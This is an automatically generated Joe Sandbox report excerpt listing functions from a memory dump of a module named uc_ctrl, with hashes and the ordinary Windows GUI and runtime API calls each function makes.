Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Empty$StateWindow
String ID:
API String ID: 2684165152-0
Opcode ID: bfcaf6782076a52646aaa66ff485bc0811a257ce25550fceb3e7042400e5320d
Instruction ID: 97270d98e762d5c564f039cbb84ed60613528a22981f12f41be62f081fa2e437
Opcode Fuzzy Hash: bfcaf6782076a52646aaa66ff485bc0811a257ce25550fceb3e7042400e5320d
Instruction Fuzzy Hash: 5CA18E31A002499FDF05CFA4D894AFEBBB6EF48314F144019E819B7790DF35A855CBA5

Function 6CB5AEE0 Relevance: 6.2, APIs: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB5AEE7
LoadImageW.USER32(?,00000000,00000000,00000000,00000000,00002000), ref: 6CB5B08A
GetObjectW.GDI32(00000000,00000018,?), ref: 6CB5B09C
DeleteObject.GDI32(00000000), ref: 6CB5B0F4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$DeleteH_prolog3ImageLoad
String ID:
API String ID: 91933946-0
Opcode ID: c38a5b07d3d654c3cbf1425b30f288e0069fe5f901fc194a9342836435cd754f
Instruction ID: 1cf97901dbe0989cf4b802f72ce3dd6526d2816fdfeafa0e37454e6e05eecb88
Opcode Fuzzy Hash: c38a5b07d3d654c3cbf1425b30f288e0069fe5f901fc194a9342836435cd754f
Instruction Fuzzy Hash: 1E7189B19012548BCF05CF54C880BEEBBB4EF09314F648269DC29BB785C7359955CFA5

Function 6CB480E7 Relevance: 6.2, APIs: 4, Instructions: 184COMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 6CB481CB
IsWindow.USER32(?), ref: 6CB48220
SetRectEmpty.USER32(?), ref: 6CB48299
SetRectEmpty.USER32(?), ref: 6CB482A3

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyRect$Window
String ID:
API String ID: 1945993337-0
Opcode ID: 3f51e0e28da89d7909c02c3e713cabdcd29a67062267e66e694c3e8efa3c2b93
Instruction ID: 7c7306552b6892d59bc24069cbcf38bcb42a406c376fde7faf867d6175281b79
Opcode Fuzzy Hash: 3f51e0e28da89d7909c02c3e713cabdcd29a67062267e66e694c3e8efa3c2b93
Instruction Fuzzy Hash: 39614F71A05615CFDB05CF68C884BEA77B9FF09314F1481AAED15EF28ADB31A905CB90

Function 6CB43163 Relevance: 6.2, APIs: 4, Instructions: 183windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4316A
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB4318C
SendMessageW.USER32(?,000000B0,?,?), ref: 6CB431A5

Part of subcall function 6CB434E0: __EH_prolog3.LIBCMT ref: 6CB434E7

MessageBeep.USER32(000000FF), ref: 6CB43332

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$H_prolog3Send$Beep
String ID:
API String ID: 2615041054-0
Opcode ID: 16631f20978e004ecd061d4a17c2317b8bfae9134339c4fdf088b50569ed0b4e
Instruction ID: 6d5b69c9a70048268ae8c29027705e2ea30d0ecad771404ee0948c94753de6a0
Opcode Fuzzy Hash: 16631f20978e004ecd061d4a17c2317b8bfae9134339c4fdf088b50569ed0b4e
Instruction Fuzzy Hash: B6714C71905289DFCF01DFA4C898BEEB7B9BF04308F148469E415A7B94DB34AA0CDB61

Function 6CB4CA6C Relevance: 6.2, APIs: 4, Instructions: 158windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4CA73
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6CB4CB57
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB4CBF7
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 6CB4CC21

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$H_prolog3InvalidateRect
String ID:
API String ID: 1245545628-0
Opcode ID: f7bbf55dc4d2f337dd827916c747f359b817cbf53b12d96175c87d65adeca50a
Instruction ID: e4061f8e1443557c5df558b9b1980142dc1494653dd142a7e50d7e2587042011
Opcode Fuzzy Hash: f7bbf55dc4d2f337dd827916c747f359b817cbf53b12d96175c87d65adeca50a
Instruction Fuzzy Hash: FC510430B041259BDF05AB28C894BBD77A3BF48714F140169E825AB7E0EF74AD299BC5

Function 6CB539D5 Relevance: 6.1, APIs: 4, Instructions: 146windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CB53A83
GetWindowRect.USER32(?,?), ref: 6CB53A90
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6CB53AC8
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB53B5C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageRectSend$EmptyWindow
String ID:
API String ID: 1914275016-0
Opcode ID: cc5a55f99e8310c31708231d576e0801f203851ee13bbb616bf5c76991933213
Instruction ID: 5d2c1efd2f85250eb585a370711963161122cc579828b26dc228939cf5dd3812
Opcode Fuzzy Hash: cc5a55f99e8310c31708231d576e0801f203851ee13bbb616bf5c76991933213
Instruction Fuzzy Hash: 6F51C471B001159FCF049FA8C894BBE7BBAFF49704F540069E905AB7A0DB34AD16CB95

Function 6CB64461 Relevance: 6.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,00000000,?,6CB6474D,00000002,00000000,?,00000000,?,6CB4FE95,00000000), ref: 6CB64492
RedrawWindow.USER32(?,00000000,00000000,00000585,?,00000000,?,6CB6474D,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB644BF
RedrawWindow.USER32(?,00000000,00000000,00000185,?,00000000,?,6CB6474D,00000002,00000000,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CB64502
RedrawWindow.USER32(?,00000000,00000000,00000585,?,?,00000000,?,6CB4FE95,00000000,00000000), ref: 6CBB1DD9

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: RedrawWindow
String ID:
API String ID: 2219533335-0
Opcode ID: 7983fb8620b3d332c332df2757f079478b0741ca5656c16511210b6af35b3271
Instruction ID: ecedeb4cff4f4d5b89b2b410cc23d8706f72c873e31a3df5cbfbaaec46834e17
Opcode Fuzzy Hash: 7983fb8620b3d332c332df2757f079478b0741ca5656c16511210b6af35b3271
Instruction Fuzzy Hash: B5411732A01A61ABDB119F25CC50B6EB774EF45B18F294625EC44ABF90EB30EC40CF91

Function 6CB3C2CE Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

InflateRect.USER32(?), ref: 6CB3C3A1
InflateRect.USER32(?), ref: 6CB3C406
InflateRect.USER32(?,000000FE,000000FE), ref: 6CB3C43A

Part of subcall function 6CB3A5DF: __EH_prolog3.LIBCMT ref: 6CB3A5E6

InflateRect.USER32(?,000000FE,000000FE), ref: 6CB3C46C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: InflateRect$H_prolog3
String ID:
API String ID: 3346915232-0
Opcode ID: 85d6caf0a5d15e8f98926307b09c89e2291ba2475276f2fa128356b0bddbac78
Instruction ID: eface45b77f96db26b68012685cb2f4a12abf3e66d30820c5337784e37712ecd
Opcode Fuzzy Hash: 85d6caf0a5d15e8f98926307b09c89e2291ba2475276f2fa128356b0bddbac78
Instruction Fuzzy Hash: F94184315052B0EBCB10AFB5CC44B9B3BB9FF4A318F106719E5695B991C731D804CB62

Function 6CB3DAD2 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 6CB3DB6A
DeleteObject.GDI32(00000000), ref: 6CB3DC34
DeleteObject.GDI32(00000000), ref: 6CB3DC3D
DeleteObject.GDI32(00000000), ref: 6CB3DC4C

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-0
Opcode ID: 53aaa960fe67f32c48f1c24422153e1d58c367e70147d7b47a3bd58bb5706985
Instruction ID: 37ff81bb1dd92285fc6b4ccb402be7098ec317b727ea1c5f31e4a6ffd73e5fde
Opcode Fuzzy Hash: 53aaa960fe67f32c48f1c24422153e1d58c367e70147d7b47a3bd58bb5706985
Instruction Fuzzy Hash: 9C41D471A612A9DBDF00CFB8D880BDEB7B5FF44308F146125E818A7A80E774D984CB91

Function 6CB889F1 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CB88AC6
SetRectEmpty.USER32(?), ref: 6CB88AD3
SetRectEmpty.USER32(?), ref: 6CB88B90
SetRectEmpty.USER32 ref: 6CB88BEF

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EmptyRect
String ID:
API String ID: 2270935405-0
Opcode ID: 9dec6aa0d1477702f6ee4542e5aa812c55f91c6ab42eee1101f36a950e0d6369
Instruction ID: 03709ee218d64057f46f4a667bd198f38a347b3bb34cd6e894d5fbfaf79891e1
Opcode Fuzzy Hash: 9dec6aa0d1477702f6ee4542e5aa812c55f91c6ab42eee1101f36a950e0d6369
Instruction Fuzzy Hash: C051E7B09212658FCB209F69C4C46E53BA8FB09B54F1801BBED0CCFA4ADBB15545DFA1

Function 6CB1BCB2 Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(00000000,?,?), ref: 6CB1BD72
GetFocus.USER32 ref: 6CB1BD8A
GetParent.USER32(?), ref: 6CB1BD98
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 6CB1BDAD

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: EnableFocusItemMenuMessageParentSend
String ID:
API String ID: 2297321873-0
Opcode ID: c340327bc7d4e5b3a1517ecf9bc45b82a48147a37daf6972288af02cf7ecc5ef
Instruction ID: 7cf915d45ca4d6ac95a78d5c820fbc732c5836ad9ffdeed2f983547979a596f6
Opcode Fuzzy Hash: c340327bc7d4e5b3a1517ecf9bc45b82a48147a37daf6972288af02cf7ecc5ef
Instruction Fuzzy Hash: DA3186B1614615EFCB289F24C884F6ABBB5FF45324F1086ADE81587FA0DB70E944CB91

Function 6CB28EBC Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB2D632: GetWindowLongW.USER32(?,000000F0), ref: 6CB2D63F

GetClientRect.USER32(?,?), ref: 6CB28F2B
IsMenu.USER32(?), ref: 6CB28F67
AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 6CB28F7A
GetClientRect.USER32(?,?), ref: 6CB28FC7

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$ClientWindow$AdjustLongMenu
String ID:
API String ID: 3435883281-0
Opcode ID: 75e41e94afe1800fb955c3b65e1ab5c176804a5bc804da1e9852e24ff38ca640
Instruction ID: 25f1e1afa6ec36c0484d375879c9f9a1ac048a825ea66f1e036e2ac08f1cd80a
Opcode Fuzzy Hash: 75e41e94afe1800fb955c3b65e1ab5c176804a5bc804da1e9852e24ff38ca640
Instruction Fuzzy Hash: 82319272E00255AFDF11DFA9C954DBFBBB9EF48214B14455AE808E3700EB389904CB91

Function 6CB44A78 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 6CB44AF8
RedrawWindow.USER32(?,?,00000000,00000105), ref: 6CB44B0D
IsRectEmpty.USER32(?), ref: 6CB44B5F
RedrawWindow.USER32(?,?,00000000,00000105), ref: 6CB44B8A

Part of subcall function 6CB44BA3: RedrawWindow.USER32(00000000,?,00000000,00000105), ref: 6CB44C16

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: RedrawWindow$EmptyRect
String ID:
API String ID: 138230908-0
Opcode ID: 0ddf66d1c4accca839066a543b813b395f1961c106dfb161e2ffe550bac4e354
Instruction ID: b26b6ff5f06ca5b4aa76161713ecebc037e3222269692f714252dfad2ea01060
Opcode Fuzzy Hash: 0ddf66d1c4accca839066a543b813b395f1961c106dfb161e2ffe550bac4e354
Instruction Fuzzy Hash: 5931AB31A06A14ABCB05CF90C884BEF7BB9EF09314F184068FD04AF244D771AA55CFA0

Function 6CC6A95C Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,9F418D08,6CC61EAD,00000000,00000000,6CB997B2,00000000,?,00000000,00000001,6CC61EAD,9F418D08,00000001,6CB997B2,6CB997B2), ref: 6CC6A9A9
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6CC6AA32
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6CC6AA44
__freea.LIBCMT ref: 6CC6AA4D

Part of subcall function 6CC63481: HeapAlloc.KERNEL32(00000000,?,?,?,6CB1A014,?,00000001,?,?,6CB00D34,?), ref: 6CC634B3

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 328430510957d5bac833e486d12d8a810208dd2acea9d720b63a805520194792
Instruction ID: 59b672f847e2973b9523808731a7a7f020f88db0cc0df5d17d679c7b68bec68c
Opcode Fuzzy Hash: 328430510957d5bac833e486d12d8a810208dd2acea9d720b63a805520194792
Instruction Fuzzy Hash: 0F31DD32A0121AABDF158F66CD80EEF7BB4EF81714B144129FC14D7A41EB35D9A4CBA0

Function 6CB4A7A1 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4A7AB

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000408), ref: 6CB4A80E
SHGetPathFromIDListW.SHELL32(?,?), ref: 6CB4A82B
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000208), ref: 6CB4A91E

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
